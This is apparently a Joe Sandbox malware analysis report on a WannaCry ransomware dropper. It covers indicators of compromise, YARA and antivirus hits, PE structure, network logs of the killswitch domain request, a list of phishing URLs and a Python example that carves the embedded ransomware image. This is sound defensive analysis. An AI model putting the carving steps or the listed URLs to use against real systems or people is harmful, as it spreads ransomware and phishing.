          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 104.16.173.80 | true | true | | unknown

          Contacted URLs:
          Name | Malicious | Antivirus Detection | Reputation
          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | true | URL Reputation: malware | unknown

          URLs from memory and binaries:
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | MSNRf9dZ63.exe | true | URL Reputation: malware | unknown
          https://www.kryptoslogic.com | MSNRf9dZ63.exe, 00000001.00000002.254790548.0000000000D34000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com0 | MSNRf9dZ63.exe, 00000001.00000002.254593327.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer | MSNRf9dZ63.exe, 00000001.00000002.254650508.0000000000D09000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ | MSNRf9dZ63.exe, 00000001.00000002.252440796.000000000019C000.00000004.00000010.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
          Contacted public IPs:
          IP | Domain | Country | ASN | ASN Name | Malicious
          104.16.173.80 | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | United States | 13335 | CLOUDFLARENETUS | true
          General Information

          Joe Sandbox Version: 36.0.0 Rainbow Opal
          Analysis ID: 721108
          Start date and time: 2022-10-12 06:22:12 +02:00
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 5m 41s
          Hypervisor based Inspection enabled: false
          Report type: full
          Sample file name: MSNRf9dZ63.exe
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed: 3
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal100.rans.evad.winEXE@4/1@2/1
          EGA Information: Failed
          HDC Information:
          • Successful, ratio: 99.4% (good quality ratio 90.1%)
          • Quality average: 76.9%
          • Quality standard deviation: 32.6%
          HCA Information:
          • Successful, ratio: 54%
          • Number of executed functions: 6
          • Number of non-executed functions: 40
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Stop behavior analysis, all processes terminated
          • Excluded domains from analysis (whitelisted): fs.microsoft.com
          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
06:23:13 | API Interceptor | 1x Sleep call for process: MSNRf9dZ63.exe modified
Match: 104.16.173.80. Other samples that contacted this IP, all detected as malicious, all with context www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
• RE8WkQYyxM.exe
• FtslFokzJt.exe
• FnRe3LZ2g8.exe
• mUzi34RGl4.exe
• fEZ8Iq7kyN.dll
• nU6RI2laJn.exe
• e0R5qxY8Vj.exe
• bGmT7Wjbn1.dll
• 101.bin.exe
• y2jb4FtSNq.dll
• KzTwbZkCyW.dll
• mAgMRXeHnV.dll
• u25HmIWOKl.dll
• JnqM1TFtYi.dll
• 5hHHsExlwx.dll
• XHlAv3DhlB.dll
• VzAh2pC8hQ.dll
• MSmReFKunQ.dll
• bdXynoRgnV.dll
• NXE94LoM7v.dll
Match: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com. Other samples that resolved this domain, all detected as malicious (context: the address it resolved to)
• 1jGr1mY0jf.exe - 104.17.244.81
• RE8WkQYyxM.exe - 104.16.173.80
• myGCO8gF16.exe - 104.17.244.81
• lPgU0gXc07.exe - 104.17.244.81
• FtslFokzJt.exe - 104.16.173.80
• FnRe3LZ2g8.exe - 104.16.173.80
• mUzi34RGl4.exe - 104.16.173.80
• BlJkPQbfq8.exe - 104.17.244.81
• fEZ8Iq7kyN.dll - 104.16.173.80
• aXhkuEgYQi.exe - 104.17.244.81
• nU6RI2laJn.exe - 104.16.173.80
• e0R5qxY8Vj.exe - 104.16.173.80
• RwsqSjIoeY.exe - 104.17.244.81
• MTyz7SbF68.dll - 104.17.244.81
• fjMkGgiDGv.dll - 104.16.173.80
• bGmT7Wjbn1.dll - 104.17.244.81
• 101.bin.exe - 104.16.173.80
• Win32.Wannacry.dll - 104.17.244.81
• y2jb4FtSNq.dll - 104.16.173.80
• HhDMZKWBi5.dll - 104.17.244.81
Match: CLOUDFLARENET US. Other samples and URLs that contacted this ASN, all detected as malicious (context: the Cloudflare address contacted). The ASN is shared hosting, so this correlation is much weaker than the IP and domain matches above.
• file.exe - 104.21.93.30
• 1jGr1mY0jf.exe - 104.17.244.81
• file.exe - 172.67.70.233
• https://www.zip711.com/forms/message/tc/?encoder=base64&tracking=YhexNnDMNko85G4IdTlnTbTtREM2qWXdjLIwFR4jUmNAVTtPbD5hQAhBTx95QuYqZ6DFpJGH5ekFqswehlp3ZjzIYvKnL6E59/XBz5cxF7zaSKI+ST7QYijnpFWHJ3VG5WQFhjvNFRfmgSx+WgPdhd4J7O3qb4C6HGq6q7MOcH5sb68x88RXIAMYNwNkS3Uvo08daliNlnVerDDKtAEjfIqkpRSkeSka6gptLoEdiE+8k5Mxo9ms0suqWjE6HgnI&url=aHR0cHM6Ly9taWMtb25saW5lLmNmZD9lPWtlbGFtaW5AYXJjZS5vcmc= - 104.16.169.131
• file.exe - 172.67.144.83
• file.exe - 104.26.0.100
• file.exe - 172.67.144.83
• #Ud83c#Udfa4 Voice.html - 104.18.11.207
• https://www.marketbeat.com/scripts/click.aspx?MessageQueueID=14351&UserID=3747225&SubjectLineID=0&RedirectURL=http://Cms-cmck.joysofthesouthwest.com/1/aGVsZW4ucm9kd2VsbEBjbXMtY21jay5jb20= - 172.66.43.14
• https://www.sowal30a.net/forms/message/tc/?tracking=o4MfLgQQaLS2l5nkRNV9T_VHPyJ6b-FSn7KldD1IIR_kkRszsi7X1_8OdoiW93JjAMV3bHk_9C7aUICXcr9Jaas4ggPgvzPFHDKq41bNwCLDUwQwsEGMyIqffPRrscSiecae7c9e29bc089ecc8041f65e19a64c&url=aHR0cHM6Ly9taWMtMGZ0LmNmZC8/ZT1iR0YxY21FdWFYQnpaVzVBWld4c2RXTnBZVzR1WTI5dA==&encoder=base64 - 104.16.169.131
• https://vk.com/away.php?to=https%3A%2F%2F31knj9.codesandbox.io/hh-%2FLAPsAMEU1d%23edward_halperin@nymc.edu&post=750781170_184&cc_key= - 172.64.144.239
• file.exe - 104.26.1.100
• Y09112022OK.htm - 104.17.25.14
• https://proscitech.com.au/collections/dangerous-goods - 172.67.38.66
• file.exe - 104.26.1.100
• file.exe - 172.67.144.83
• file.exe - 104.26.0.100
• file.exe - 104.26.1.100
• 20082994838.htm - 104.18.11.207
• file.exe - 172.67.144.83
          Process:C:\Users\user\Desktop\MSNRf9dZ63.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):3514368
          Entropy (8bit):7.996072890929898
          Encrypted:true
          SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2Hj:QqPe1Cxcxk3ZAEUadzR8yc4Hj
          MD5:7F7CCAA16FB15EB1C7399D422F8363E8
          SHA1:BD44D0AB543BF814D93B719C24E90D8DD7111234
          SHA-256:2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD
          SHA-512:83E334B80DE08903CFA9891A3FA349C1ECE7E19F8E62B74A017512FA9A7989A0FD31929BF1FC13847BEE04F2DA3DACF6BC3F5EE58F0E4B9D495F4B9AF12ED2B7
          Malicious:true
          Yara Hits:
          • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 98%
          • Antivirus: Metadefender, Detection: 89%, Browse
Reputation:moderate, very likely benign file (Joe Sandbox's reputation field for this hash; it is contradicted by the YARA and antivirus verdicts above and must not be read as a clean verdict)
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................
          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):5.315026188747063
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:MSNRf9dZ63.exe
          File size:6729728
          MD5:1d38638153085a0a0f0a4f7174e52a9b
          SHA1:f0bb8179052451ac327e6fff048bc27c73bf7310
          SHA256:9678763f65e207dde99f4f8723ddfc44bc2d3f9b490aa3d3d4676c661474d59f
          SHA512:ff7c5b94ffff6e6d877e18b3fb543235d3bcb3e27b5d27a5fdc60005b4095a1ba21a4365a7a41bf6ed1e42fe547d6ddf0d05ed78442cd7ec42668b80a0a0d8f6
          SSDEEP:98304:5iqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2HI:5iqPe1Cxcxk3ZAEUadzR8yc4HI
          TLSH:67663394612CB2FCF0440EB44473892AB7B33C69A7BA5E1F9BC086660D53F5BAFD0641
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=..A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L..
          Icon Hash:00828e8e8686b000
          Entrypoint:0x409a16
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          DLL Characteristics:
          Time Stamp:0x4CE78ECC [Sat Nov 20 09:03:08 2010 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:9ecee117164e0b870a53dd187cdd7174
Instruction (disassembly at the entry point 0x409a16; this is the Visual C++ 6.0 CRT startup stub, calling __set_app_type, __p__fmode, __p__commode and __getmainargs through the IAT, not the sample's own logic)
          push ebp
          mov ebp, esp
          push FFFFFFFFh
          push 0040A1A0h
          push 00409BA2h
          mov eax, dword ptr fs:[00000000h]
          push eax
          mov dword ptr fs:[00000000h], esp
          sub esp, 68h
          push ebx
          push esi
          push edi
          mov dword ptr [ebp-18h], esp
          xor ebx, ebx
          mov dword ptr [ebp-04h], ebx
          push 00000002h
          call dword ptr [0040A0C0h]
          pop ecx
          or dword ptr [0070F894h], FFFFFFFFh
          or dword ptr [0070F898h], FFFFFFFFh
          call dword ptr [0040A0C8h]
          mov ecx, dword ptr [0070F88Ch]
          mov dword ptr [eax], ecx
          call dword ptr [0040A0CCh]
          mov ecx, dword ptr [0070F888h]
          mov dword ptr [eax], ecx
          mov eax, dword ptr [0040A0E4h]
          mov eax, dword ptr [eax]
          mov dword ptr [0070F890h], eax
          call 00007F7CF0957D11h
          cmp dword ptr [00431410h], ebx
          jne 00007F7CF0957BFEh
          push 00409B9Eh
          call dword ptr [0040A0D4h]
          pop ecx
          call 00007F7CF0957CE3h
          push 0040B010h
          push 0040B00Ch
          call 00007F7CF0957CCEh
          mov eax, dword ptr [0070F884h]
          mov dword ptr [ebp-6Ch], eax
          lea eax, dword ptr [ebp-6Ch]
          push eax
          push dword ptr [0070F880h]
          lea eax, dword ptr [ebp-64h]
          push eax
          lea eax, dword ptr [ebp-70h]
          push eax
          lea eax, dword ptr [ebp-60h]
          push eax
          call dword ptr [0040A0DCh]
          push 0040B008h
          push 0040B000h
          call 00007F7CF0957C9Bh
          Programming Language:
          • [C++] VS98 (6.0) SP6 build 8804
          • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa1e0 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x310000 | 0x35a454 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x188 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8bca | 0x9000 | False | 0.534423828125 | data | 6.1345234015658825 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xa000 | 0x998 | 0x1000 | False | 0.37646484375 | data | 3.9239511141494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x30489c | 0x305000 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x310000 | 0x35a454 | 0x35b000 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
R | 0x3100a4 | 0x35a000 | PE32 executable (GUI) Intel 80386, for MS Windows | English | United States
RT_VERSION | 0x66a0a4 | 0x3b0 | data | English | United States
The "R" resource is 0x35a000 = 3514368 bytes, exactly the size of the dropped C:\Windows\tasksche.exe listed above; the decompiled routine at the end of this report fetches it with FindResourceA(0, 0x727, "R").
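The embedded image can be verified against the dropped file without a third-party PE library. Below is an added example (not Joe Sandbox code and not part of the sample) that walks a .rsrc directory with the standard library only, locates the type "R" / ID 0x727 pair the dropper asks for, and carves and hashes it. Because the 6.7 MB sample cannot be embedded here, the self-test builds a small constructed .rsrc blob of the same shape (named type "R", ID 0x727, one language entry); the layout constants, the builder and all function names are this example's own.

```python
"""Walk a PE .rsrc directory and carve one resource, standard library only.

Added example for this report; not Joe Sandbox code and not part of the
sample. Offsets inside .rsrc are relative to the section start; a data
entry's OffsetToData is an RVA, so the section's RVA is needed to carve.
"""
import hashlib
import struct

RES_DIR = struct.Struct("<IIHHHH")  # IMAGE_RESOURCE_DIRECTORY, 16 bytes
RES_ENTRY = struct.Struct("<II")    # IMAGE_RESOURCE_DIRECTORY_ENTRY, 8 bytes
RES_DATA = struct.Struct("<IIII")   # IMAGE_RESOURCE_DATA_ENTRY, 16 bytes
HIGH_BIT = 0x80000000               # name is a string / offset is a subdirectory
MASK = 0x7FFFFFFF


def _entries(rsrc: bytes, dir_off: int):
    """Yield (name_or_id, offset, is_subdir) for every entry of one directory."""
    _, _, _, _, n_named, n_ids = RES_DIR.unpack_from(rsrc, dir_off)
    pos = dir_off + RES_DIR.size
    for _ in range(n_named + n_ids):
        name, off = RES_ENTRY.unpack_from(rsrc, pos)
        pos += RES_ENTRY.size
        if name & HIGH_BIT:  # IMAGE_RESOURCE_DIR_STRING_U: WORD length + UTF-16LE chars
            str_off = name & MASK
            (length,) = struct.unpack_from("<H", rsrc, str_off)
            key = rsrc[str_off + 2:str_off + 2 + 2 * length].decode("utf-16-le")
        else:
            key = name
        yield key, off & MASK, bool(off & HIGH_BIT)


def find_resource(rsrc: bytes, res_type, res_id):
    """Return (rva, size) of the first language entry under type/ID, else None.

    res_type and res_id are ints for numbered resources or str for named ones;
    the dropper calls FindResourceA(0, 0x727, "R"), i.e. type "R", ID 0x727.
    """
    for t_key, t_off, t_sub in _entries(rsrc, 0):
        if t_key != res_type or not t_sub:
            continue
        for n_key, n_off, n_sub in _entries(rsrc, t_off):
            if n_key != res_id or not n_sub:
                continue
            for _, l_off, l_sub in _entries(rsrc, n_off):
                if not l_sub:
                    rva, size, _, _ = RES_DATA.unpack_from(rsrc, l_off)
                    return rva, size
    return None


def carve(rsrc: bytes, rsrc_rva: int, rva: int, size: int) -> bytes:
    """Slice the resource bytes out of the section (the data sits inside .rsrc)."""
    start = rva - rsrc_rva
    if start < 0 or start + size > len(rsrc):
        raise ValueError("resource data lies outside the .rsrc bytes given")
    return rsrc[start:start + size]


# ---- constructed self-test input (the real sample is not embedded) ----------
FAKE_RSRC_RVA = 0x310000  # .rsrc virtual address from the report's section table
FAKE_PAYLOAD = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"constructed stand-in for the embedded image"


def build_fake_rsrc(payload: bytes, rsrc_rva: int) -> bytes:
    """Build a minimal three-level .rsrc: named type "R" -> ID 0x727 -> lang 0x409 -> data.

    Offsets: root dir 0x00, type dir 0x18, name dir 0x30, data entry 0x48,
    name string 0x58, payload 0x60.
    """
    blob = bytearray(0x60)
    RES_DIR.pack_into(blob, 0x00, 0, 0, 0, 0, 1, 0)                      # 1 named entry
    RES_ENTRY.pack_into(blob, 0x10, HIGH_BIT | 0x58, HIGH_BIT | 0x18)    # "R" -> type dir
    RES_DIR.pack_into(blob, 0x18, 0, 0, 0, 0, 0, 1)                      # 1 ID entry
    RES_ENTRY.pack_into(blob, 0x28, 0x727, HIGH_BIT | 0x30)              # 0x727 -> name dir
    RES_DIR.pack_into(blob, 0x30, 0, 0, 0, 0, 0, 1)                      # 1 ID entry
    RES_ENTRY.pack_into(blob, 0x40, 0x409, 0x48)                         # en-US -> data entry
    RES_DATA.pack_into(blob, 0x48, rsrc_rva + 0x60, len(payload), 0, 0)  # RVA, size, codepage, reserved
    struct.pack_into("<H", blob, 0x58, 1)
    blob[0x5A:0x5C] = "R".encode("utf-16-le")
    return bytes(blob) + payload


def demo():
    """Locate, carve and hash the constructed resource; returns (rva, size, sha256)."""
    rsrc = build_fake_rsrc(FAKE_PAYLOAD, FAKE_RSRC_RVA)
    rva, size = find_resource(rsrc, "R", 0x727)
    data = carve(rsrc, FAKE_RSRC_RVA, rva, size)
    return rva, size, hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    print("resource R/0x727 at RVA 0x%x, %d bytes, sha256 %s" % demo())
```

To run it on the real file, read the .rsrc section's raw bytes (its PointerToRawData comes from the section header; the report prints only the virtual address 0x310000 and the sizes), call find_resource(rsrc, "R", 0x727), carve with rsrc_rva=0x310000 and compare the size with 0x35a000 and the SHA-256 with the report's 2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD for tasksche.exe; a different size means a different build of the dropper.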
DLL | Imports
KERNEL32.dll: WaitForSingleObject, InterlockedIncrement, GetCurrentThreadId, GetCurrentThread, ReadFile, GetFileSize, CreateFileA, MoveFileExA, SizeofResource, TerminateThread, LoadResource, FindResourceA, GetProcAddress, GetModuleHandleW, ExitProcess, GetModuleFileNameA, LocalFree, LocalAlloc, CloseHandle, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, GlobalAlloc, GlobalFree, QueryPerformanceFrequency, QueryPerformanceCounter, GetTickCount, LockResource, Sleep, GetStartupInfoA, GetModuleHandleA
ADVAPI32.dll: StartServiceCtrlDispatcherA, RegisterServiceCtrlHandlerA, ChangeServiceConfig2A, SetServiceStatus, OpenSCManagerA, CreateServiceA, CloseServiceHandle, StartServiceA, CryptGenRandom, CryptAcquireContextA, OpenServiceA
WS2_32.dll: closesocket, recv, send, htonl, ntohl, WSAStartup, inet_ntoa, ioctlsocket, select, htons, socket, connect, inet_addr
MSVCP60.dll: ??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@XZ
iphlpapi.dll: GetAdaptersInfo, GetPerAdapterInfo
WININET.dll: InternetOpenA, InternetOpenUrlA, InternetCloseHandle
MSVCRT.dll: __set_app_type, _stricmp, __p__fmode, __p__commode, _except_handler3, __setusermatherr, _initterm, __getmainargs, _acmdln, _adjust_fdiv, _controlfp, exit, _XcptFilter, _exit, _onexit, __dllonexit, free, ??2@YAPAXI@Z, _ftol, sprintf, _endthreadex, strncpy, rand, _beginthreadex, __CxxFrameHandler, srand, time, __p___argc
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/12/22-06:23:13.693284 | UDP | 2024291 | ET TROJAN Possible WannaCry DNS Lookup 1 | 59477 | 53 | 192.168.2.7 | 8.8.8.8
10/12/22-06:23:12.540467 | TCP | 2031515 | ET TROJAN Known Sinkhole Response Kryptos Logic | 80 | 49699 | 104.16.173.80 | 192.168.2.7
10/12/22-06:23:13.761402 | TCP | 2024298 | ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 | 49700 | 80 | 192.168.2.7 | 104.16.173.80
10/12/22-06:23:12.511053 | TCP | 2024298 | ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 | 49699 | 80 | 192.168.2.7 | 104.16.173.80
10/12/22-06:23:13.791210 | TCP | 2031515 | ET TROJAN Known Sinkhole Response Kryptos Logic | 80 | 49700 | 104.16.173.80 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 12, 2022 06:23:12.493108034 CEST | 49699 | 80 | 192.168.2.7 | 104.16.173.80
Oct 12, 2022 06:23:12.510332108 CEST | 80 | 49699 | 104.16.173.80 | 192.168.2.7
Oct 12, 2022 06:23:12.510427952 CEST | 49699 | 80 | 192.168.2.7 | 104.16.173.80
Oct 12, 2022 06:23:12.511053085 CEST | 49699 | 80 | 192.168.2.7 | 104.16.173.80
Oct 12, 2022 06:23:12.527982950 CEST | 80 | 49699 | 104.16.173.80 | 192.168.2.7
Oct 12, 2022 06:23:12.540467024 CEST | 80 | 49699 | 104.16.173.80 | 192.168.2.7
Oct 12, 2022 06:23:12.540509939 CEST | 80 | 49699 | 104.16.173.80 | 192.168.2.7
Oct 12, 2022 06:23:12.540676117 CEST | 49699 | 80 | 192.168.2.7 | 104.16.173.80
Oct 12, 2022 06:23:12.545087099 CEST | 49699 | 80 | 192.168.2.7 | 104.16.173.80
Oct 12, 2022 06:23:12.562146902 CEST | 80 | 49699 | 104.16.173.80 | 192.168.2.7
Oct 12, 2022 06:23:13.733834028 CEST | 49700 | 80 | 192.168.2.7 | 104.16.173.80
Oct 12, 2022 06:23:13.751301050 CEST | 80 | 49700 | 104.16.173.80 | 192.168.2.7
Oct 12, 2022 06:23:13.751434088 CEST | 49700 | 80 | 192.168.2.7 | 104.16.173.80
Oct 12, 2022 06:23:13.761401892 CEST | 49700 | 80 | 192.168.2.7 | 104.16.173.80
Oct 12, 2022 06:23:13.779067993 CEST | 80 | 49700 | 104.16.173.80 | 192.168.2.7
Oct 12, 2022 06:23:13.791209936 CEST | 80 | 49700 | 104.16.173.80 | 192.168.2.7
Oct 12, 2022 06:23:13.791358948 CEST | 49700 | 80 | 192.168.2.7 | 104.16.173.80
Oct 12, 2022 06:23:13.791393995 CEST | 80 | 49700 | 104.16.173.80 | 192.168.2.7
Oct 12, 2022 06:23:13.791551113 CEST | 49700 | 80 | 192.168.2.7 | 104.16.173.80
Oct 12, 2022 06:23:13.793680906 CEST | 49700 | 80 | 192.168.2.7 | 104.16.173.80
Oct 12, 2022 06:23:13.810925961 CEST | 80 | 49700 | 104.16.173.80 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 12, 2022 06:23:12.410038948 CEST | 59477 | 53 | 192.168.2.7 | 8.8.8.8
Oct 12, 2022 06:23:12.432110071 CEST | 53 | 59477 | 8.8.8.8 | 192.168.2.7
Oct 12, 2022 06:23:13.693284035 CEST | 59477 | 53 | 192.168.2.7 | 8.8.8.8
Oct 12, 2022 06:23:13.714802027 CEST | 53 | 59477 | 8.8.8.8 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 12, 2022 06:23:12.410038948 CEST | 192.168.2.7 | 8.8.8.8 | 0x256d | Standard query (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | A (IP address) | IN (0x0001) | false
Oct 12, 2022 06:23:13.693284035 CEST | 192.168.2.7 | 8.8.8.8 | 0xf6ea | Standard query (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 12, 2022 06:23:12.432110071 CEST | 8.8.8.8 | 192.168.2.7 | 0x256d | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.16.173.80 | A (IP address) | IN (0x0001) | false
Oct 12, 2022 06:23:12.432110071 CEST | 8.8.8.8 | 192.168.2.7 | 0x256d | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.17.244.81 | A (IP address) | IN (0x0001) | false
Oct 12, 2022 06:23:13.714802027 CEST | 8.8.8.8 | 192.168.2.7 | 0xf6ea | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.16.173.80 | A (IP address) | IN (0x0001) | false
Oct 12, 2022 06:23:13.714802027 CEST | 8.8.8.8 | 192.168.2.7 | 0xf6ea | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.17.244.81 | A (IP address) | IN (0x0001) | false
HTTP hosts contacted:
• www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49699 | 104.16.173.80 | 80 | C:\Users\user\Desktop\MSNRf9dZ63.exe
Timestamp | kBytes transferred | Direction | Data
Oct 12, 2022 06:23:12.511053085 CEST | 89 | OUT | GET / HTTP/1.1
Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Cache-Control: no-cache
Oct 12, 2022 06:23:12.540467024 CEST | 89 | IN | HTTP/1.1 200 OK
          Date: Wed, 12 Oct 2022 04:23:12 GMT
          Content-Type: text/html
          Content-Length: 607
          Connection: close
          Server: cloudflare
          CF-RAY: 758d0f0f39c49b9e-FRA
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 